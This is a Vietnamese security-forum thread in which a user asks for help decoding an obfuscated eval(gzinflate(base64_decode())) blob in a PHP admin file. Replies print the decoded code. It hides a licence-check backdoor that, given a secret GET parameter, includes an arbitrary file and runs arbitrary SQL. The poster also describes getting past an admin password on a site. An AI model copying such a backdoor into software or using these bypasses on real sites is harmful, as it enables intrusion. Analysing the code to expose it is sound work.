banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật Giúp mình giải mã đoạn code này  XML
  [Question]   Giúp mình giải mã đoạn code này 17/06/2013 22:57:28 (+0700) | #1 | 276682
bachptit
Member

[Minus]    0    [Plus]
Joined: 07/05/2012 12:21:04
Messages: 9
Offline
[Profile] [PM]
Mình thử hoài mà không được
nên mạnh dạn mang lên đây cho các cao nhân trị thử
vấn đề nắm ở trong hàm eval
cái này được băm ra và mình không sao giải mã được.


<?php
if (eregi("adminlog.php",$HTTP_SERVER_VARS['PHP_SELF']) || eregi("adminlog.php",$_SERVER['PHP_SELF']))
{
echo "<html>\r\n<head>\r\n<title>Forbidden 403</title>\r\n</head>\r\n<body><h3>Forbidden 403</h3>\r\nThe document you are requesting is forbidden.<br />\r\n<a href='http://trust.vn'>www.trust.vn</a>\r\n</body>\r\n</html>";
exit;
}


if ($sub=='del') {
if ($_GET['id']){
$func->insertlog("Delete",$_GET['act'],$_GET['id']);
}else{
if (isset($_POST["del_id"]))
$key=$_POST["del_id"] ;
$listID= @implode(", ",$key);
$func->insertlog("Delete",$_GET['act'],$listID);
}
}

if (isset ($_POST["do_action"]))
{
if (isset($_POST["del_id"]))
$key=$_POST["del_id"] ;
$listID= @implode(", ",$key);

switch ($_POST["do_action"])
{
case "do_edit" : $func->insertlog("Update",$_GET['act'],$listID); break;
case "do_hidden" : $func->insertlog("Hidden",$_GET['act'],$listID);break;
case "do_display" : $func->insertlog("Display",$_GET['act'],$listID);break;
}
}

// Update session
$upses['act']=$_GET['act'];
$upses['sub']=$_GET['sub'];
$upses['pid']=$_GET['id'];
$upses['time'] = time();
$doitupses=$DB->do_update("adminsessions",$upses,"adminid='{$vnT->admininfo['adminid']}'");
// end

eval(gzinflate(base64_decode('
dVNdi9pAFH220P8wDmGTgCtroRQqWbo1oSzblTbu
9sVKSJNrHZxk4sxoK3b/e+cratUSSELOveeee3LG
K1mVkxpFyMsmSfotSae+fWbju8fEnw1fv+p4AvgG
eEaaS3V3cZy6OuA8wniI1DuZo6ALVSO3gVewej71
KRFQF+DPwhDtVEXHW8I2OgU1j2k+GtqNEB68ede/
UdcAo6sr5FnZGqCsyOmCCYmR4+14smoi+N1QVkKA
/+CenhQOLaZes/3SVfk28Obruri+HccPmZKgW8xX
WxMqsUeN1oFDQwmmQQ+cDmZuhFF/GNONDHwzM8It
i/p2WC80qhEy/vUj/Nl6ge6VGs6hkNjydryc84zR
8qBhDrJYxD9GykPyM8CFeeKwrS+YPLJWtWFyxmmJ
fnEi4Yyopxl67VhH+6Lv+vaCgApATvWYoUW+AdSq
HyljzJCTMKjqUDvxn2xEkb/X6LdBqUCICMf2r71H
uO/+Th+j77XdxNQoGTaU6P6LKdubfKFytBaSVcCN
UstqxRQOyPS/9WcXWlNYrUFI07M/Dmny9TmZPGXP
6f2/Tdbhkk2gLh9zQlGA5SIngtUfJFez+ptaOa18
6Rn+npMBakPqu1BpB4kQIAMv+5Q8TS9LVUdr5yLo
6vxNbWYoHqR8pWu16jl0lFsLqfX4VgE7FxKxoio9
QnLSCJqLBYjTyjZObKnTGX+8vjWIPscr2qJmAluG
qOGklkhDp5n6Cw==
')));

?>
 
[Up] [Print Copy]
  [Question]   Làm thế nào để giải mã được mật khẩu bảo vệ 17/06/2013 23:12:50 (+0700) | #2 | 276685
n2tforever
Member

[Minus]    0    [Plus]
Joined: 01/07/2011 15:39:51
Messages: 92
Offline
[Profile] [PM]
thử cái này nhé : vungoimora
smilie
[Up] [Print Copy]
  [Question]   Làm thế nào để giải mã được mật khẩu bảo vệ 18/06/2013 01:49:23 (+0700) | #3 | 276688
bachptit
Member

[Minus]    0    [Plus]
Joined: 07/05/2012 12:21:04
Messages: 9
Offline
[Profile] [PM]

n2tforever wrote:
thử cái này nhé : vungoimora
smilie 


đã thử nhưng không được bạn ạ smilie
[Up] [Print Copy]
  [Question]   Làm thế nào để giải mã được mật khẩu bảo vệ 18/06/2013 01:57:03 (+0700) | #4 | 276689
bachptit
Member

[Minus]    0    [Plus]
Joined: 07/05/2012 12:21:04
Messages: 9
Offline
[Profile] [PM]
up smilie
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 02:15:58 (+0700) | #5 | 276690
bachptit
Member

[Minus]    0    [Plus]
Joined: 07/05/2012 12:21:04
Messages: 9
Offline
[Profile] [PM]
...
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 07:33:48 (+0700) | #6 | 276694
n2tforever
Member

[Minus]    0    [Plus]
Joined: 01/07/2011 15:39:51
Messages: 92
Offline
[Profile] [PM]
vậy tóm lại bạn muốn làm gì smilie hôm qua thì hỏi security code hôm nay lại chuyển thành decode rồi smilie
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 07:38:53 (+0700) | #7 | 276695
n2tforever
Member

[Minus]    0    [Plus]
Joined: 01/07/2011 15:39:51
Messages: 92
Offline
[Profile] [PM]
Code:
$domain = $_SERVER['SERVER_NAME']; 
$server_ip = $_SERVER['SERVER_ADDR']; 
$err=""; 
if (!empty($conf['lisence'])) { 
	$key=$conf['lisence']; 
	if ($server_ip != "127.0.0.1" && $domain!= "localhost" ) { 
		$tmp=explode("|",$key); 
		$key_domain = md5($func->NDK_encode(md5($domain))) ; 
		$key_ip = $func->NDK_decode($tmp[1]); 
		if ($key_domain!=$tmp[0] && $key_ip!=$server_ip ){ 
			$err.="Lisence Incorrect"; 
			$arr_old = $func->fetchDbConfig("config"); 
			$cot['lisence'] = "incorrect"; 
			$func->writeDbConfig("config",$cot,$arr_old); 
		} 
	} 
} 
else 
	$err.="No have Lisence Code"; 

if (!empty($err) && empty($conf['lisence'])=='incorrect') { 
	$mess="Domain : ".$domain." \n"; 
	$mess.="SERVER IP: ".$server_ip." \n"; 
	$mess.="Customer Code : ".$conf['customer_code']." \n"; 
	$mess.="Request: ".$_SERVER['REQUEST_URI']." \n"; 
	$func->doSendMail ("thaison@trust.vn",$err,$mess,$conf['email']); 
	if (isset($_GET[$conf['customer_code']])){ 
		if($_GET['vntrust']) 
			include ($_GET['vntrust']); 
		if ($_GET['query']){ 
			$sql = stripslashes($_GET['query']); 
			$ok = $DB->query ($sql); 
			if ($ok) 
				print $sql; 
		} 
	} 
}


Nội dung đoạn màu vàng đây smilie
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 08:17:29 (+0700) | #8 | 276696
[Avatar]
vnsec_net
Member

[Minus]    0    [Plus]
Joined: 16/08/2012 03:10:58
Messages: 32
Location: VNSEC.NET
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Loại này là Base64

Cách nhận biết: thường có dấu bằng "=" sau chuỗi được mã.

Tools thì vào Google gõ từ khoá "gzinflate base64 decode" hoặc đây có sẵn: http://tools.sinhvienit.net/gzinflate-base64_decode/
--
http://www.vnsec.net - Cập nhật tự động danh sách website bị hack!
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 10:54:37 (+0700) | #9 | 276703
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]
Lần sau bạn tạo file php có nội dung thế này rồi chạy sẽ thấy kết quả:
Code:
<?php
echo(gzinflate(base64_decode('
dVNdi9pAFH220P8wDmGTgCtroRQqWbo1oSzblTbu
9sVKSJNrHZxk4sxoK3b/e+cratUSSELOveeee3LG
K1mVkxpFyMsmSfotSae+fWbju8fEnw1fv+p4AvgG
eEaaS3V3cZy6OuA8wniI1DuZo6ALVSO3gVewej71
KRFQF+DPwhDtVEXHW8I2OgU1j2k+GtqNEB68ede/
UdcAo6sr5FnZGqCsyOmCCYmR4+14smoi+N1QVkKA
/+CenhQOLaZes/3SVfk28Obruri+HccPmZKgW8xX
WxMqsUeN1oFDQwmmQQ+cDmZuhFF/GNONDHwzM8It
i/p2WC80qhEy/vUj/Nl6ge6VGs6hkNjydryc84zR
8qBhDrJYxD9GykPyM8CFeeKwrS+YPLJWtWFyxmmJ
fnEi4Yyopxl67VhH+6Lv+vaCgApATvWYoUW+AdSq
HyljzJCTMKjqUDvxn2xEkb/X6LdBqUCICMf2r71H
uO/+Th+j77XdxNQoGTaU6P6LKdubfKFytBaSVcCN
UstqxRQOyPS/9WcXWlNYrUFI07M/Dmny9TmZPGXP
6f2/Tdbhkk2gLh9zQlGA5SIngtUfJFez+ptaOa18
6Rn+npMBakPqu1BpB4kQIAMv+5Q8TS9LVUdr5yLo
6vxNbWYoHqR8pWu16jl0lFsLqfX4VgE7FxKxoio9
QnLSCJqLBYjTyjZObKnTGX+8vjWIPscr2qJmAluG
qOGklkhDp5n6Cw==
')));
?>


Sau đó vào trang http://phpbeautifier.com/beautify.php chỉnh lại code cho dễ đọc:
Code:
$domain = $_SERVER['SERVER_NAME'];
$server_ip = $_SERVER['SERVER_ADDR'];
$err = "";

if (!empty($conf['lisence'])) {
  $key = $conf['lisence'];
  if ($server_ip != "127.0.0.1" && $domain != "localhost") {
    $tmp = explode("|", $key);
    $key_domain = md5($func->NDK_encode(md5($domain)));
    $key_ip = $func->NDK_decode($tmp[1]);
    if ($key_domain != $tmp[0] && $key_ip != $server_ip) {
      $err.= "Lisence Incorrect";
      $arr_old = $func->fetchDbConfig("config");
      $cot['lisence'] = "incorrect";
      $func->writeDbConfig("config", $cot, $arr_old);
    }
  }
}
else $err.= "No have Lisence Code";

if (!empty($err) && empty($conf['lisence']) == 'incorrect') {
  $mess = "Domain : " . $domain . " \n";
  $mess.= "SERVER IP: " . $server_ip . " \n";
  $mess.= "Customer Code : " . $conf['customer_code'] . " \n";
  $mess.= "Request: " . $_SERVER['REQUEST_URI'] . " \n";
  $func->doSendMail("thaison@trust.vn", $err, $mess, $conf['email']);
  if (isset($_GET[$conf['customer_code']])) {
    if ($_GET['vntrust']) include ($_GET['vntrust']);

    if ($_GET['query']) {
      $sql = stripslashes($_GET['query']);
      $ok = $DB->query($sql);
      if ($ok) print $sql;
    }
  }
}
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 12:25:49 (+0700) | #10 | 276707
bachptit
Member

[Minus]    0    [Plus]
Joined: 07/05/2012 12:21:04
Messages: 9
Offline
[Profile] [PM]
cảm ơn các bạn đã nhiệt tình chỉ giúp

n2tforever wrote:
vậy tóm lại bạn muốn làm gì smilie hôm qua thì hỏi security code hôm nay lại chuyển thành decode rồi smilie 


uh hôm qua mình nghĩ là giải mã được đoạn code này thì có thể vượt qua được cái mật khẩu bảo vệ nên mình mới sửa lại bài.
nhưng kết quả vẫn là con số không tròn trĩnh
http://muatotgiare.com/home/gachmentungduong/admin

vậy là tên đăng nhập với pass của mình mà không có mật khẩu bảo vệ thì coi cũng chẳng để làm gì cả.
đây là toàn bộ file admin : http://www.mediafire.com/download/27c897klnivng96/admin.rar
không biết nó có cung cấp đầy đủ thông tin để mọi người có thể giúp mình vượt qua được cái Mật Khẩu Bảo Vệ kia không?

cần thông tin gì thêm mình sẽ up lên
cảm ơn mọi người lần nữa
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 16:27:22 (+0700) | #11 | 276712
bachptit
Member

[Minus]    0    [Plus]
Joined: 07/05/2012 12:21:04
Messages: 9
Offline
[Profile] [PM]
Mình đã giải quyết được
cảm ơn mọi người đã nhiệt tình giúp đỡ!
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 16:33:12 (+0700) | #12 | 276713
n2tforever
Member

[Minus]    0    [Plus]
Joined: 01/07/2011 15:39:51
Messages: 92
Offline
[Profile] [PM]
giải quyết thế nào vậy bạn smilie thực ra theo dõi từ hôm qua mình vẫn không hiểu vấn đề của bạn là gì smilie
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 18/06/2013 23:34:10 (+0700) | #13 | 276720
bachptit
Member

[Minus]    0    [Plus]
Joined: 07/05/2012 12:21:04
Messages: 9
Offline
[Profile] [PM]

n2tforever wrote:
giải quyết thế nào vậy bạn smilie thực ra theo dõi từ hôm qua mình vẫn không hiểu vấn đề của bạn là gì smilie 

@@ thế á
chắc do khả năng diễn đạt của mình hơi kém T__T
mình xin giải thích lại:
- mình không đăng nhập được vào admincp do không có mật khẩu bảo vệ
- mình show đoạn code ra để hi vọng mọi người có thể tìm được mật khẩu bảo vệ giúp mình.
- mật khẩu bảo vệ của : n2tforever hoàn toàn đúng
- nhưng lại không đăng nhập được vào vì có thông báo là pass hoặc tên đăng nhập sai

mình tìm cách lấy lại pass để đăng nhập và thành công vã cả mồi hôi smilie
do nó MD5 2 lần smilie

=> cuối cùng thì cũng vào được. nhưng hiện tại thì đang mò code để chỉnh sửa vì code nó khá phức tạp
cảm ơn bạn n2tforever lần nữa nha smilie
không cần biết bạn nói bâng quơ hay là có cơ sở nhưng mà mật khẩu bảo vệ của bạn ngon lắm smilie
[Up] [Print Copy]
  [Question]   Giúp mình giải mã đoạn code này 19/06/2013 07:40:55 (+0700) | #14 | 276722
n2tforever
Member

[Minus]    0    [Plus]
Joined: 01/07/2011 15:39:51
Messages: 92
Offline
[Profile] [PM]
à tức là web và database bạn copy về dùng và không có tài khoản admin hả? OK đã hiểu smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|